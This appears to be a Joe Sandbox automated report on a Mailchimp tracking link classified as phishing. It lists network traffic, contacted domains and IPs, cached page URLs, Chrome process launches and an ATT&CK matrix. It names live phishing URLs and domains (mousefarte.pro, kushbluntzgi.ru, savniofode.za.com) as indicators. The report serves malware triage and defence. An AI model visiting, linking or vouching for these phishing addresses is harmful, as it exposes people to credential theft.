        Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3088sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ede8e2645a67d81sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I91XYQS%2FYUjETIAuGW4A9K1gWNIznWjLHDgSQHkw4%2BBjcfQxs1PW4sq6WzAZFsNUA7wHXZn2s%2Bz8wBk7kzRXb4Vwe4wOTEW%2FgOrN8UCYZAmM9imFNHIkerVnhCG9U0fMvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cc5a5b4296e0cd9-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:23 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: oeO3bVljpBqXHdkDXZk9xMPQwVOTr6JUuVM=$7oenHSL1F5KLh5L5Server: cloudflareCF-RAY: 8cc5a5c8fdf30cbe-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:28 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5e8habOw1GJ34/SbNspn1jsEnPgDGxt/3v0=$vjglxguqQ59+HjRLServer: cloudflareCF-RAY: 8cc5a5e599720f3e-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: t19yaeRB+cKIeKnNuoVXZZQ/aIsLydFQKPQ=$XoYOM+wR1ws1pvXEServer: cloudflareCF-RAY: 8cc5a62c09fc1993-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0usshNJLM3GY2usosuFMEeYoB3cu6WaCqlSiAum7jNIUQTUjetfSdVnhNoQvSldebH5LwNspS2%2FwVdyTdorIWZ4IEa9E0QDCHBu%2FH3whRZLmD01q%2FfhipKE1skeZFUBRNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cc5a6507d0d42f5-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:15:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvD%2FZBEWx7AcQfdA3TeMFJrt3IGhdWOw0cWSk2O9Qo93CSXDI22P9WOK6HGUPRsunxdfJz86I7Gko5BEz5moJ%2F6nDGx%2FgVTaBHATO43Iz5wiPsFJ%2F7GeGXPbWXILYl4IBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cc5a65a9ca24391-EWR
        Source: chromecache_123.2.drString found in binary or memory: http://savniofode.za.com/?utm_source=substack&#38;utm_medium=email
        Source: chromecache_123.2.drString found in binary or memory: http://savniofode.za.com/?utm_source=substack&utm_medium=email
        Source: chromecache_115.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: chromecache_115.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#about
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#classic-cars
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#contact
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#electric-vehicles
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#faq
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#learn-more
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#modern-supercars
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#privacy
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#services
        Source: chromecache_115.2.drString found in binary or memory: https://kushbluntzgi.ru/#terms
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 60334 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60338 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60333
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60332
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60331
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60339
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60338
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60337
        Source: unknownNetwork traffic detected: HTTP traffic on port 60343 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60336
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60335
        Source: unknownNetwork traffic detected: HTTP traffic on port 60333 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 60337 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60350 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60344
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60343
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60342
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60341
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60340
        Source: unknownNetwork traffic detected: HTTP traffic on port 60340 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60344 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60349
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60348
        Source: unknownNetwork traffic detected: HTTP traffic on port 60348 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60346
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60332 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60336 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60350
        Source: unknownNetwork traffic detected: HTTP traffic on port 60341 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 60349 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 60335 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60331 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60339 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60342 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: classification engineClassification label: mal68.phis.win@26/20@30/13
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2204,i,11409684658956308218,7678980179476139140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2204,i,11409684658956308218,7678980179476139140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        kushbluntzgi.ru
        188.114.96.3
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            code.jquery.com
            151.101.194.137
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  unknown
                  www.google.com
                  216.58.206.36
                  truefalse
                    unknown
                    mousefarte.pro
                    188.114.96.3
                    truefalse
                      unknown
                      link.sbstck.com
                      188.114.96.3
                      truefalse
                        unknown
                        savniofode.za.com
                        154.26.158.144
                        truefalse
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            unknown
                            tqaun.us12.list-manage.com
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                unknown
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                • URL Reputation: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81false
                                  unknown
                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                    unknown
                                    https://link.sbstck.com/redirect/cba7f617-bad8-4206-a765-e1d0a6aa1814?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EYfalse
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/false
                                        unknown
                                        https://mousefarte.pro/4pAtm/,false
                                          unknown
                                          https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#true
                                            unknown
                                            http://savniofode.za.com/?utm_source=substack&utm_medium=emailfalse
                                              unknown
                                              https://mousefarte.pro/favicon.icofalse
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5a5a47e0643e9&lang=autofalse
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc5a5a47e0643e9/1727882120479/XRkbRnieRFP1t3hfalse
                                                      unknown
                                                      https://kushbluntzgi.ru//false
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=I91XYQS%2FYUjETIAuGW4A9K1gWNIznWjLHDgSQHkw4%2BBjcfQxs1PW4sq6WzAZFsNUA7wHXZn2s%2Bz8wBk7kzRXb4Vwe4wOTEW%2FgOrN8UCYZAmM9imFNHIkerVnhCG9U0fMvw%3D%3Dfalse
                                                          unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailtrue
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://kushbluntzgi.ru/#classic-carschromecache_115.2.drfalse
                                                              unknown
                                                              https://cdn.jsdelivr.net/npm/bootstrapchromecache_115.2.drfalse
                                                                unknown
                                                                https://kushbluntzgi.ru/#contactchromecache_115.2.drfalse
                                                                  unknown
                                                                  https://kushbluntzgi.ru/#learn-morechromecache_115.2.drfalse
                                                                    unknown
                                                                    https://kushbluntzgi.ru/#serviceschromecache_115.2.drfalse
                                                                      unknown
                                                                      http://savniofode.za.com/?utm_source=substack&#38;utm_medium=emailchromecache_123.2.drfalse
                                                                        unknown
                                                                        https://kushbluntzgi.ru/#faqchromecache_115.2.drfalse
                                                                          unknown
                                                                          https://kushbluntzgi.ru/#privacychromecache_115.2.drfalse
                                                                            unknown
                                                                            https://kushbluntzgi.ru/#electric-vehicleschromecache_115.2.drfalse
                                                                              unknown
                                                                              https://kushbluntzgi.ru/#modern-supercarschromecache_115.2.drfalse
                                                                                unknown
                                                                                https://kushbluntzgi.ru/#chromecache_115.2.drfalse
                                                                                  unknown
                                                                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.csschromecache_115.2.drfalse
                                                                                    unknown
                                                                                    https://kushbluntzgi.ru/#aboutchromecache_115.2.drfalse
                                                                                      unknown
                                                                                      https://kushbluntzgi.ru/#termschromecache_115.2.drfalse
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.17.24.14
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        154.26.158.144
                                                                                        savniofode.za.comUnited States
                                                                                        174COGENT-174USfalse
                                                                                        104.18.94.41
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.18.95.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        216.58.206.36
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        188.114.96.3
                                                                                        kushbluntzgi.ruEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.66.137
                                                                                        unknownUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        151.101.194.137
                                                                                        code.jquery.comUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.17.25.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        IP
                                                                                        192.168.2.4
                                                                                        192.168.2.6
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1524306
                                                                                        Start date and time:2024-10-02 17:14:05 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 17s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:browseurl.jbs
                                                                                        Sample URL:https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal68.phis.win@26/20@30/13
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 172.217.16.206, 173.194.76.84, 142.250.185.195, 34.104.35.123, 104.102.57.226, 20.114.59.183, 93.184.221.240, 52.165.164.15, 192.229.221.95, 13.95.31.18, 216.58.206.35, 131.107.255.255
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e13829.x.akamaiedge.net, clientservices.googleapis.com, wu.azureedge.net, dns.msftncsi.com, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, swc.list-manage.com.edgekey.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e
                                                                                        No simulations
                                                                                        InputOutput
                                                                                        URL: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email Model: jbxai
                                                                                        URL: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email Model: jbxai
                                                                                        URL: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email Model: jbxai
                                                                                        URL: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email# Model: jbxai
                                                                                        URL: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email Model: jbxai
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:downloaded
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
